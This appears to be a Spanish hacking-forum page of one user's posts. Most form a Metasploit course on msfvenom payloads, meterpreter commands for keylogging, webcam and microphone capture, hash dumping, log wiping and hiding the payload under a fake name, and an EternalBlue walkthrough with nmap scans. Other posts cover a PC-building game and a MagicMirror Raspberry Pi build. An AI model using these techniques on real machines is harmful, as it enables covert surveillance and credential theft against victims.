Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - puntoCL

#41
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si, pero un hacker profesional que puede hacer con mi ip

Mmmm, nada y un monton a la vez, todo depende de sus habilidades y de que brechas de seguridad tenga esa ip.

Que es lo peor que me puede hacer?
[/quote]

Lo peor que te pueden hacer es infectar un equipo o capturar el trafico de dicha RED "IP". Te voy a contar un caso sobre la compañía de telecomunicaciones movistar. Hace tiempo vi un post que un loco de otra casa pudo entrar al router de su propia casa eso fue en España y yo soy de chile y quise comprobar si acá en chile se puede hacer lo mismo y a si sacar una conclusión que capas que países que tienen movistar pueden tener el mismo problema digamos. Entonces lo que hice fui a la casa de un amigo que tiene movistar puse mi IP publica en el navegador y claro pude entrar a mi router hasta pude logear a si que imagínate la posibilidades puedes capturar la red, haces un nmap ver si ese router es vulnerable o puedes ver la clave del wifi e ir a su casa y conectarte y hacer un ataque mas directo o configurar el router las rutas o dns y puedes llegar hasta infectar a los usuarios que estén conectado y esto no lo vas a ver en tutoriales en youtube o en foro es solamente conocimientos puro y un hacker real profesional puede ver las posibilidades que se puede llegar hacer y como dije tiene que ser un real hacker. y si es que te pregunta si otras compañías se puede ser lo mismo no sabría decirte averígualo tu mismo.

Saludos
#42




En esta quinta aparte del curso estaré hablando sobre sobre msfvenom y sobre reverse shell para entender de como crear un payload con msfvenom, FatRat, SET y uno que otros RAT.




PAYLOADS: Este es un módulo que se encuentra en los distintos códigos que se ejecuta en el sistema explotando con existo y por cual obtienes un meterpreter como resultado final.

SHELLCODE: Se refiere a cualquier código de byte que pueda insertar en un exploit para lograr un objetivo particular. Shellcode es normalmente la carga útil de un exploit. Las instrucciones maliciosas proporcionan al atacante acceso de línea de comando a una computadora, todo ello con los privilegios del proceso que se explota. Normalmente el código de explotación está escrito en c o c++ por la mayoría sistema operativos que está escrita en esos lenguajes.




MSFVENOM: Es un generador de paylodad independiente de metasploit. Esta herramienta es una combinación de msfpayload y msfencode utilizar ambas herramientas en una única instancia. Msfvenom reemplazo tanto msfpayload como msfencode a partir del 8 de junio del 2015.

Ventajas de msfvenom:

-   Es potente ya que es una transformación de dos herramientas como msfencode y msfpayload.
-   Una mayor velocidad.
-   Y su facilidad de usar.

Tener en cuenta si buscan en internet "cómo crear un payload" es lo más probable que encuentren tutoriales antiguos que ocupan msfpayload y no msfvenom. No significa que no sirva el tutorial básicamente tiene que remplazar el msfpayload por msfvenom.




Antes de comenzar a utilizar msfvenom primero veremos sus opciones que trae. para eso escribimos en la consola
Código: php
msfvenom -h




OPCIONES:

-p | --payload: Se debe especificar el payload que se quiere utilizar

-l  | -- list: Se debe especiar el tipo de módulos que se quiere listar, por ejemplos encoder, payloads, etc..

-n | --nopsled: Especificar el tamaño sobre el payload.

-f | --formal: Se debe especificar el formato de salida, por ejemplo, ejecutable, raw. Etc...

-e | --encoder: Especifica el encoder que se requiere utilizar, por ejemplo, x86/countdown. Esta función es idéntica en msfencode.

-a | --arch: Se especifica la arquitectura donde se ejecutará el payload.

-s | --space: Especifica el tamaño máximo que debe tener el payload.

-b| --bad-chars: Especifica el listado de caracteres que debe evitarse en la creación del payload, por ejemplo, para evitar los bye null x00

-i | --iterations: Especifica el número de iteraciones que ejecutara el encoder.

-k | --keep: Especifica que el payload se ejecutara en un thead. Este parámetro implementa la técnica de ejecutable con "plantilla personalizada sigilosa"

-x |--template: Especifica una planilla personalizable. Este parámetro implementa la técnica del ejecutable con plantilla personalizada.

-c | --add-code: Permite añadir un ejecutable personalizado.

-o | --options: Lista las opciones de los payloads.



Para dar un poco más de énfasis voy a explicar la opción "-l || --list" Nos muestra un listado de los módulos como encoders payloads etc...



Entonces si escribimos en la consola
Código: php
msfvenom -l all
nos mostrara todos los payload que existen, como payload para Android, IOS, Linux, Windows, etc... se lo digo porque uno cuando ven los tutoriales se quedan con eso y no explorar más a ya para sacarle todo el provecho de la herramienta y esto es una instancia de que exploren.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Curso Metasploit - Part. 5 – Hablemos de msfvenom

#43




Esta es la segunda parte de las demostraciones de meterpreter.




idletime: Muestra el tiempo muerto o AFK de la maquina comprometida.



===========================================================================================

shell: El meterpreter se convierte en un cmd de Windows, En otras palabras más simples.



Para volver a meterpreter escribimos exit.

===========================================================================================

search: Buscar archivos o directorios. Si escribimos search -h nos aparece las opciones del comando search.



Para buscar un archivo agregamos la opcion -f de file. Si nosotros queremos buscar un archivo y si sabemos cual es su nombre como por ejemplo buscar un txt que tenga el nombre cuenta bancaria, entonces escribimos en metrepeter search -f cuenta bancaria.txt. y en caso si quieres buscar todos los archivos de una cierta extensión debemos remplazamos con un asterisco (*) el nombre del archivo ejemplo: search -f *.txt el asterisco en el mundo de la informática se deriva todo.



===========================================================================================

hashdump: No muestra los hashes del Sistema comprometido.



Como se puede apreciar el comando ha obtenido el hash correspondiente a los usuarios existentes en el sistema.

===========================================================================================

background: Tener la session actual en Segundo plano. En metasploit podemos tener muchas maquinas comprometida y esto se guardan en sesiones con una identificacion de números consecutivo 1.2.3.4. etc....  En forma más fácil de decir cuando nosotros ejecutamos background de una forma nos desconectamos de la maquina comprometida y volvimos a metasploit y nos podemos conectar con otra máquina infectada esta opción igual se ocupa cuando nosotros queremos subir de privilegios y a si podemos ejecutar exploit dentro de la sessiones.   



Como pueden ver en la imagen que volví a metasploit. Para ver todas la sesiones activas escribimos sessions



Como pueden ver tengo cuatros sesiones abiertas se repite por que ataque cuatras veces la misma maquina con el mismo payload estaba haciendo algunas pruebas de privilegio.

Y para ingresar una sesión que nos apetezca escribimos sessions -i (Numero de la session) Ejemplo quiero entrar en la sesión 3 escribo sessions -i 3



Y de forma inmediata a meterpreter.

===========================================================================================

kill: Con este comando Podemos matar un proceso, pero necesitamos saber el PPID y para eso tenemos que ejecutar ps, el PPID es el segundo número que nos aparece.



Quiero matar un proceso del TeamViewe que su PPID es 1072 entonces escribo kill 1072 y el proceso desaparece.



===========================================================================================

irb: Podemos interactuar una shell de ruby. Lo que nos permite usar el lenguaje de scripting ruby para interactuar con el sistema comprometido.

Código: php

meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"Computer"=>"CARDINI-PC", "OS"=>"Windows 7 (Build 7601, Service Pack 1).", "Architecture"=>"x64", "BuildTuple"=>nil, "System Language"=>"es_ES", "Domain"=>"WORKGROUP", "Logged On Users"                                                =>2}
>> exit
meterpreter >


Para salir de la Shell escribimos exit.

===========================================================================================

quit: Vuelve a la consola Meterpreter y cierra la sesión activa.



Como pueden ver me mato el merpreter y cerró la sesión 3



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#44




En esta segunda parte mostrare el comando faltante. Y sus usos




keyscan : De forma práctica esto es un keylogger. Captura las pulsaciones del teclado. Este comando tiene 3 funciones.

keyscan_start: Activa el keylogger.
keyscan_stop: Para el keylogger.
keyscan_dump: Ver lo que se capturo.

Dejar en contagia que el comando dump no sirve si ustedes paran el kayscan.



===========================================================================================
#45
Dudas y pedidos generales / Re:Error con Kali Linux
Marzo 08, 2018, 01:31:52 PM
No sabemos cual es el error si no dices. no podemos adivinar.

Saludos
#46




Hoy le estaré enseñando a cómo funcionan algunos comandos de meterpreter, a comparación con el post anterior que eran definiciones.




sysinfo: Nos mostrara la información del sistema remoto como el sistema operativo, la arquitectura, lenguaje etc...



===========================================================================================

pwd: Este comando igual que en Linux permite saber en que carpeta o directorio nos encontramos.



===========================================================================================

ls: Ver en listados el contenido de los directorios, Es lo mismo que en linux.



===========================================================================================

ps: Muestra un listado de todos los proceso de la maquina comprometida.



===========================================================================================

migrate: Migra un procesos a otro. Cuando nosotros atacamos se crea un proceso que seria del payload bueno este proceso es visible para nuestra victima entonces si la maquina comprometida ve ese proceso podrá matar el proceso y también saber dónde está ubicado nuestro payload y borrarlo directamente por que el administrador de tarea tiene la opcion de ver el proceso y ir a la direccion del archivo. para evitar todo esto nosotros lo que hacemos es migrara el proceso del payload a otro por otro proceso como por ejemplo explore.exe que es un proceso que nunca se cierra.

OJO! migra el proceso no significa que van a finalizar el proceso que quieren migrar lo que realmente hace es camuflar el proceso a otro. como una fusión

Para dejar en claro al momento de buscar nuestro payload en el administrador de tarea es el mismo nombre que le damos a nuestro payload al momento de crearlo. Es decir, si yo creo un payload con el nombre payload a si mismo va a aparecer es el administrador de tarea de Windows, como sale en la imagen de abajo.  Acá se la pueden creanear "ingeniar" el nombre de su payload como adobe_flash o no se update Windows en caso de si que no migran o no puedan migrar.

Ese sería obviamente nuestro payload. Y a si se vería en administrador de tarea en Windows.



Bueno para ocupar el comando migrate nosotros debemos conocer el PID "Identificador de proceso" de nuestro payload en mi caso seria 2792 "Recuerden para saber el PID tienen que usar el comando ps"



Y lo voy a ocultar a otro proceso que nunca se cierran como por ejemplo Explore.exe en mi caso el PID del explore seria 1536



Entonces en meterpreter escribimos migrate más el PID al cual queremos ocultarnos migrate 1536



Y si escribimos ps payload.exe desaparece por que esta en Explore.exe

===========================================================================================

getpid: Muestra el PID del proceso en que estamos actualmente.



No dice que estoy en el proceso 1536 el que era Explore.exe cuando hice el ejemplo del migrate.

===========================================================================================

getuid: Nos indica en que usuarios estamos conectado. Con esto podemos ver nuestros privilegios.



Como se podra ver que no estamos como administrador.

===========================================================================================

webcam_list: Lista webcams, podemos ver si la maquina atacante tiene una webcam.



===========================================================================================

webcam_snap: Tome una foto de la cámara web especificada, Cuando ejecutamos el comando webcam_list cierto que no aparece un listado de las camaras que tiene nuestra victima enumerada entonces cuando ejecutamos webcam_snap tenemos que poner con que camara queremos sacar la en mi caso yo puse 1.



Y se genera un jpg y a la vez no dice donde esta ubicado. lo mismo podemos ocupar con el comando webcam_stream para grabar "video"

===========================================================================================

record_mic: Grabar el audio desde el microfono.



con el -d podemos darle cuantos segundos queremos grabar si queremos grabar una hora escribimos record_mic -d 3600

===========================================================================================

screenshot: Saca un pantallazo, con esto podemos ver lo que esta haciendo la victima.



===========================================================================================

shell: Ejecuta una shell de windows "CMD".



Con solo escribir "exit" para volver a meterpreter.

===========================================================================================

keyscan : De forma práctica esto es un keylogger. Captura las pulsaciones del teclado. Este comando tiene 3 funciones.

keyscan_start: Activa el keylogger.
keyscan_stop: Para el keylogger.
keyscan_dump: Ver lo que se capturo.

Dejar en contagia que el comando dump no sirve si ustedes paran el kayscan.



===========================================================================================

download: Descargar un archivo.

Es con solo escribir download mas el archivo con la extencion.




===========================================================================================

cat: El comando cat muestra el contenido de un archivo sin tener la nececidad de descargar el archivo para ver su contendio.



===========================================================================================

edit: Editar archivo. Podemos editar archivo, Escribimos edit mas la ruta con comillas






No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#47


exactamente lo que su nombre ofrece y muy pronto estará disponible su primera versión pública en Steam.

Se trata de PC Building Simulator, un simulador que te permite ensayar y aprender como es ensamblar un tarro sin las complicaciones de que tu gato se entrometa ni el peligro de que tus dedos de mantequilla arruinen algo que no deberían. La aplicación te permite de manera virtual armar un PC desde cero y de manera bastante intuitiva.

Además de ello, el mismo juego incluye un "Modo de Carrera", donde tomarás el rol de un dueño de tienda reparadora de computadoras, con varios retos que te pondrán a prueba a la hora de ensamblar o arreglar tarros de diversas formas y tamaños.

Sumado a eso, una buena cantidad de marcas pretenden dar soporte oficial al simulador, introduciendo sus propias partes de PC de forma licenciada, para que puedas literalmente juguetear con el hardware original. Entre las empresas ya anunciadas a tener presencia estarán NZXT, Cooler Master, RAIJINTEK, MSI y EVGA.

PC Building Simulator llegará a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Si estás interesado, por mientras puedes descargar su prototipo gratuito No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



#48
Dudas y pedidos generales / Re:error inicio metasploit
Febrero 28, 2018, 09:32:55 PM
te falto el comando reload_all al final.

Estas logeado como root "root@parrot" ok?. reinicia el servicio postgresql "service postgresql restart", ejecuta metasploit "msfconsole" y escribe "reload_all" para recargar todos los módulos de todas las rutas de módulos definidas. y recuerda todo como root y nos cuenta que pasa.

Saludos


#49
Dudas y pedidos generales / Re:Dual boot
Febrero 28, 2018, 08:49:02 PM
Hola. @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Borrando la partición de kali, formatear esa particion y lo instala de nuevo.

Saludos
#50
Dudas y pedidos generales / Re:error inicio metasploit
Febrero 28, 2018, 01:25:13 AM
Hola.

El primer error es por que no estas como root "superusuario", como especifica metasploit ERROR: /usr/bin/msfdb: must be run as root para conectarte a la base de datos de metasploit se debe ejecutarse como root.

Lo segundo el errores de los modulos modificaste las carpetas de los módulos? Cuando quiste instalar eternalblue?.

Pero primero intentar ejecutar metasploit "msfconsole" como root y después nos cuenta que a pasado, por que si sigue problema con los módulos tendría que reiniciar la base de datos "msfdb reinit" ejecutar metaploit nuevamente "msfconsole" y recargar todos los módulos de todas las rutas de módulos definidas "reload_all" y si sigue con el error actualizar metasploit "msfupdate". Pero primero prueba con el modo root.

Sobre de instalar eternalblue con doublepulsar no es necesario instalarlo ms17 ya viene en metasploit. si no te aparece es por que tiene una versión mas antigua de metasploit. metasploit incorporo ms17 como modulo ya mejorado y comprimido. Te dejo un tutorial sobre eso.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora actualmente metasploit incorporo mas eternal como el EternalSynergy, EternalRomance y EternalChampion . acá te dejo la información de eso.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.!

#51
Dudas y pedidos generales / Re:Metadatos
Febrero 21, 2018, 09:48:08 PM
Hola. @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como dicen y que yo te recomiendo que ocupes FOCA.

FOCA: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#52
Yo veo que el cain se puede descargar lo mas bien.

URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y sobre lo que dices que no se te ejecuta la instalación y te sale las alertas es por seguridad por el antivirus que no te deja, desactiva el antivirus.
#53



En esta cuarta parte definiendo los comandos de meterpreter, En la parte 4.1 Estaré especificando los comandos más interesante de forma más profundas, Como por ejemplo de cómo cambiar de proceso, subir de privilegio "administrador", en que privilegio estamos, grabar la pantalla y tomar el control de los dispositivo "Mouse y teclado".

meterpreter: abreviatura de The Meta-Interpreter, es un payload avanzado que está incluido en Metasploit Framework. Básicamente permite a los usuarios controlar la pantalla de un dispositivo mediante VNC y navegar, cargar y descargar archivos etc..








Core Commands
=============

?: Como todo los "?" es el menú de ayuda que te muestra los comandos.
background: Ejecuta la sesión actual en segundo plano.
bgkill: Elimina una secuencia de comandos meterpreter de segundo plano.
bglist: Listas ejecutando scripts de fondo.
bgrun: Ejecuta un script meterpreter en segundo plano.
channel: Muestra las informaciones sobre canales activos.
close: Cierra un canal.
disable_unicode_encoding: Deshabilita la codificación de cadenas Unicode.
enable_unicode_encoding: Permite la codificación de cadenas Unicode.
exit: Termina la sesión de meterpreter.
help: Tiene la misma función igual que "?".
info: Muestra información sobre un módulo de publicación.
interact: Podemos iniciar el Interactiva Ruby Shell con el comando irb, lo que nos permite usar el lenguaje de scripting Ruby para interactuar con el sistema comprometido.
irb: Suelta al modo scripting irb.
load: Carga uno o más extensiones de meterpreter.
migrate: Migra el proceso. Cuando nosotros atacamos una maquina Windows se crea un proceso. Si la victima cierra el proceso nos desconectamos de la máquina. Entonces existe este comando para ocultarnos a otro proceso como a explorer.exe que nadie lo quita.
quit: Vuelve a la consola Meterpreter y cierra la sesión activa.
read: Lee datos de un canal.
resource: Ejecuta los comandos almacenados en un archivo.
run: Podemos ejecutar un script Meterpreter.
use: Para comandos y funcionalidades adicionales, podemos cargar extensiones Meterpreter con el comando use.
write: Escribe datos en un canal...




Stdapi: File system Commands
============================

cat: El comando cat muestra el contenido de un solo archivo.
cd: Cambiar de directorio.
download: Descargar un archivo o directorio.
edit: Editar archivo.
getlwd: Imprimir el directorio de trabajo local.
getwd: Imprimir el directorio de trabajo.
lcd: Cambiar el directorio de trabajo local.
lpwd: Imprimir el directorio de trabajo local.
ls: Ver los archivos del directorio.
mkdir: Crear directorio.
mv: Mover directorio.
pwd: Muestra el directorio de trabajo.
rm: Borrar un archivo específico.
rmdir: Eliminar directorio.
search: Buscar un archivo.
upload: Subir un archivo o directorio.




Stdapi: Networking Commands
===========================

arp: Mostrar el caché ARP de host
getproxy: Mostrar la configuración del proxy actual
ifconfig: Mostrar las interface de red.
ipconfig: Permite visualizar las IP "la misma información que Windows".
netstat: Mostrar las conexiones de red.
portfwd: Reenviar un puerto local a un servicio remoto.
route: Nos permite visualizar y modificar la tabla de enrutamiento.




Stdapi: System Commands
=======================

clearev: Limpia el log.
drop_token: Deje de hacerse pasar por el token actual.
execute: Ejecuta un comando.
getenv: Obtenga uno o más valores de variables de entorno
getpid: muestra el PID del proceso en que estamos actualmente.
getprivs: Nos permite obtener todos los privilegios de administración.
getuid: Nos indica en que usuarios estamos conectado. Con esto podemos ver nuestros privilegios.
kill: Termina un proceso.
ps: Muestra una lista de proceso de la maquina comprometida. Con su PID.
reboot: Reinicia el equipo víctima.
reg: Modificar e interactuar con el registro remoto. "regedit"
rev2self: Llama a RevertToSelf () en la máquina remota.
shell: Ejecuta una shell "CMD".
shutdown: Apaga la computadora.
steal_token: Robar las fichas disponibles para un determinado proceso y hacerse pasar por esa señal.
suspend: Suspende o reanuda una lista de procesos.
sysinfo: No mostrara la información del sistema remoto como el sistema operativo, la arquitectura, lenguaje etc... Igual se puede ocupar el comando "run get_env" detalla más información.




Stdapi: User interface Commands
===============================

enumdesktops: Permite consultar todas las sesiones (o escritorios).
getdesktop: Permiten obtener el desktop del usuario actual
idletime: Nos muestra el tiempo en que el usuario esta afk.
keyscan_dump: Volcar las teclas remotas capturadas en el objetivo.
keyscan_start: Comienza a capturar pulsaciones del teclado. "keylogger"
keyscan_stop:   Para la captura las pulsaciones del teclado.
screenshot: Saca pantallazo. "con esto podemos ver lo que está haciendo la maquina victima"
setdesktop: Mover a una estación de trabajo y escritorio diferente.
uictl: Este comando nos permite controlar algún dispositivo. Mouse, Teclado etc...




Stdapi: Webcam Commands
=======================

record_mic: Grabe audio desde el micrófono predeterminado por "X" segundos.
webcam_chat: Comienza un video chat.
webcam_list: Lista webcams.
webcam_snap: Tome una instantánea de la cámara web especificada.
webcam_stream: Reproduce una transmisión de video desde la cámara web especificada.




Priv: Elevate Commands
======================

getsystem: Intente elevar su privilegio al del sistema local.




Priv: Password database Commands
================================

hashdump: Volcar todos los hashes en el objetivo.




Priv: Timestomp Commands
========================

timestomp: Cambiar los atributos de un archivo específico.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Curso Metasploit - Part. 4 - Definiciones Comandos de meterpreter
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#54
aah claro que te sale sesiones 2, 3, 4. por que estas generado sesiones aunque ataques el mismo PC las secciones se van generando no se concentra una sesión fija en una cierta maquina.

Ya pero cuando abres la sesion te aparecen en la pantalla
Código: php
meterpreter >

Por que lo otro lo que dijiste al principio "cuando quiero usar el comando para ingresar a directorio o manejarme por el cli" puede ser que estés ocupado comando de windows y no de linux recuerda que estas en una consola de linux.

y el segundo poste me dijiste "queda en exploit handler" es por que no estas en escucha puede ser que no ejecuto el macro o el anti-virus el puerto por que el esta en la escucha esperando respuesta y no va a ver respuesta si no ejecutan el encode

No me dijiste la IP de tu maquina atacante y victima cuando generas el encode "ps1encode" el comando -i va la ip de tu maquina atacante. capas que te puedes a ver equivocado.
#55
podrias dar detalle como estas creando el payload y cuales son tu pasos de metasploit. El exploit no esta en modo escucha por que conseguiste el cli pero no te genero el meterpreter puede ser que no generaste un meterpreter reverse_tcp por eso quiero ver lo que haces para ver el problema y ayudarte.

Saludos.
#56
Arduino - Raspberry PI / MagicMirror 2
Enero 05, 2018, 11:06:56 PM
Un "Magic Mirror" es un espejo que además de reflejarnos, permite también mostrar varias informaciones que nos pueden ayudar en el día a día como agenda, noticias, tránsito, estado del tiempo, entre muchas otras disponibles por la comunidad "Magic Mirror ".

¡Manos a la obra!



Materiales

Software:

Hardware:

  • Monitor TFT / LCD "La pulgada es a gusto"
  • Kit Raspberry Pi
  • Tarjeta de memoria de al menos 4 GB de capacidad.
  • Acrílico transparente "Las dimensiones es a gusto"
  • Película espejo de una vía "One Way Solar Reflective Mirror Sticker"



La Construcción:

Para empezar fue necesario abrir el monitor con las llaves de tornillo adecuadas y medir la pantalla del mismo. Para esta pantalla de 17 "las medidas son de 36 cm de altura y 29,5 cm de longitud. Utilizando estos datos, fue necesario cortar el acrílico y la película a medida. Una vez que el corte del acrílico es gratuito en la tienda donde fue adquirido, no recomiendo cortar en casa con una sierra de corte, pues va a romper el mismo. Para el corte de la película, fue necesario echar la pantalla sobre la misma y cortar con el X-acto alrededor de la pantalla.



Con el acrílico y la película ya cortados, fue necesario retirar las películas protectoras del acrílico y de la película espejo y efectuar la aplicación de la película espejo con la pantalla. Este proceso se ha efectuado con cuidado y para evitar la creación de burbujas de aire, así como dejar pequeñas partículas de polvo debajo de la película. Al final identificé bastantes burbujas de aire, las cuales retiré quirúrgicamente perforando las mismas con un alfil fino. Como pueden verificar el resultado no fue el mejor pues la película no llegó en las mejores condiciones habiendo sufrido bastante en el transporte. Sin embargo y teniendo en cuenta el propósito, lo aplicé en la misma.



Con el x-acto cortar dos tiras finas de cinta adhesiva de doble cara para poder pegar el acrílico preparado anteriormente en la pantalla.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como la pantalla montada, podemos volver a montar el monitor en su capa exterior terminando así esta fase de construcción.



software:
Para este propósito decidí utilizar como base una distribución del sistema operativo linux, simple y ligera como el Raspbian Strech Lite.

En primer lugar es necesario descargar el mismo disponible en el sitio oficial. Después de la descarga de la distribución tenemos que colocarla en la tarjeta utilizando el método indicado en el artículo, cambiando sólo el archivo de la misma.

Una vez finalizado el proceso anterior, vamos a pasar a la configuración del sistema operativo, instalación y personalización de MagicMirror².

configuración:

Actualizar la distribución:

Código: php
sudo apt-get update && sudo apt-get upgrade -y




Actualizar el firmware

Código: php
sudo rpi-update




Instalación de los requisitos

Código: php
sudo apt-get -y install xorg x11-xserver-utils chromium-browser git libgtk-3-0


Eliminar los archivos temporales de instalación

Código: php
sudo apt-get clean


Instalar MagicMirror²

Código: php
https://raw.githubusercontent.com/MichMich/MagicMirror/master/installers/raspberry.sh | bash




Después de la correcta instalación de MagicMirror² tendremos que parar la ejecución del mismo a través del comando

Código: php
pm2 stop MagicMirror


Personalización del sistema operativo:

Abrir el archivo /etc/rc.local y agregar las líneas antes de la línea "exit 0":

Código: php
iwconfig wlan0 power off
su -s /bin/bash -c "startx -- -nocursor" pi&


Estas líneas deshabilitar la administración de energía del controlador inalámbrico para evitar errores de sincronización y permitirá el inicio del escritorio con el usuario pi y sin el cursor del ratón, respectivamente.

Cambiar la línea "allowed_users=console" a "allowed_users=anybody" del archivo /etc/X11/Xwrapper.config

Abrir el archivo /home/pi/.xinitrc y añadir las siguientes líneas:

Código: php
export DISPLAY=:0.0
xset s off
xset s noblank
xset -dpms
cd /home/pi/MagicMirror
node serveronly &
chromium-browser --noerrdialogs --kiosk --incognito http://localhost:8080


Estas líneas permitirán a MagicMirror² arrancar inmediatamente después de iniciar el sistema, sin el protector de pantalla activa y el control de energía de la pantalla.

Personalización del "Magic Mirror":

Gracias a la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
están disponibles muchos más módulos para poder agregar, sin embargo vamos a configurar los que están disponibles originalmente. Todas las configuraciones para estos módulos están disponibles en el fichero "/home/pi/MagicMirror/config/config.js" siendo necesario cambiarlo.

Información meteorológica:

Para obtener su información a través de la API es necesario registrarse en el sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Reemplace el campo "YOUR_OPENWEATHER_API_KEY" por la clave disponible en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es necesario también cambiar la identificación y el nombre de la ubicación, que pueden consultar en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La configuración debe parecerse al siguiente ejemplo:

Código: php
config: {
location: "Lisbon",
locationID: "2267057",  //ID from http://www.openweathermap.org/help/city_list.txt
appid: "YOUR_OPENWEATHER_API_KEY" //from https://home.openweathermap.org/api_keys
}


Calendário:

Para añadir el calendario simplemente cambiar la forma en que el campo de dirección URL con la dirección de un calendario en formato ICS, como el siguiente ejemplo actualizado con las fiestas portuguesas y una vía de ejemplo para el calendario de Google:

Código: php
calendars: [
{
symbol: "calendar-check-o ",
url: "webcal://calendarr.com/portugal/ics/"
},
{
symbol: "calendar-check-o ",
url: "https://calendar.google.com/calendar/ical/MY_INFO.ics"
}
]


Noticias:

Para añadir una fuente de noticias basta con cambiar la ruta del campo url con la dirección de una fuente en el formato xml, según el siguiente ejemplo actualizado con las noticias de Pplware:

Código: php
feeds: [
{
title: "New York Times",
url: "http://www.nytimes.com/services/xml/rss/nyt/HomePage.xml",
},
{
                title: "Pplware",
                        url: "https://pplware.sapo.pt/feed/"
                }
]


CSS:

Para optimizar el espacio disponible de la pantalla, es necesario cambiar el archivo "/home/pi/MagicMirror/css/custom.css" con las siguientes líneas:

Código: php
body {
        margin:0px;
        position:unset;
}

.region.bottom {
        bottom:3%;
}

.region.right{
        right:3%;
}


Esta imagen indica el problema que estaba teniendo y la solución después de cambiar el archivo CSS





Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#57



En esta tercer parte vamos a conseguir un meterpreter con el famoso exploit ETERNALBLUE.

Dejare esto dos conceptos para que se entienda un poco mas.

SMB: Es un protocolo de red que permite compartir archivos, impresoras, etcétera, entre nodos de una red que usan sistema operativo Windows

CVE: Common Vulnerabilities and Exposures, "Vulnerabilidades y exposiciones comunes" Este es un estándar para nombrar vulnerabilidades de seguridad. CVE-YYYY-NNNN YYYY indica el año y NNNN indica el número de la vulnerabililocal.

ETERNALBLUE: Es un exploit de una vulnerabilidad del protocolo (SMB). Esta vulnerabilidad se indica mediante como CVE-2017-0144. Esta vulnerabilidad existe porque el servidor SMB versión 1 (SMBv1) maneja mal los paquetes especialmente diseñadas de ataque remotos y esto permite ejecutar código arbitrario.

El 8 de abril del 2017, TheShadowBroker público una gran arsenal de herramientas de hacking de la NSA. Lo cual lo puedes ver en GitHub

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este exploit solo ataca a sistema operativos Windows 7 y Windows server 2008. Lo extraordinario de este exploit es que no se necesita enviar un tipio de archivo "PAYLOAD" y espera que la víctima lo ejecute y pensar como engañar a la víctima con ingeniera social  para que ejecute dicho archivo, Bueno con este exploit es totalmente lo contrario no necesitas crear nada, solo necesita configurar algunos parámetros básicos y tendrás el control total de una máquina.

Estare simulando un ataque real.

Primero tenemos que identificar la víctima y para eso tenemos que ver que máquinas están conectado en nuestra red y para eso ocuparemos una herramienta que busque host vivos. Con la herramienta NETDISCOVER



Esta herramienta básicamente lo que hace es detectar los host que están conectado en nuestra red, Esta herramienta hace su búsqueda por medio de peticiones ARP.

Código: php
netdiscover -i wlan0 -r 192.168.0.0/24


-i = La interfaz de red que estaremos utilizando, para ver nuestra interfaz ocupe ifconfig.

-r = El rango del escaneo.

Y como resultado no aparecerán todos los host conectado.



Como podrán ver tengo tres host:

192.168.0.1: sería el router
192.168.0.100: Maquina de la víctima
192.168.0.102: Un celular.

Ya una vez identificada la victima que sería la IP 192.168.0.100 por lo cual tenemos que saber si esa máquina es vulnerable o no, por lo cual ocuparemos nmap esta herramienta tiene script para escanear vulnerabilidades. El script que estaremos utilizando --script smb-vuln-ms17-010.nse y a la vez veremos qué sistema operativo es la máquina de la victima.

Código: php
nmap -sC -sV -p 445 --script smb-vuln-ms17-010.nse 192.168.0.100


Y no aparecerá esto.



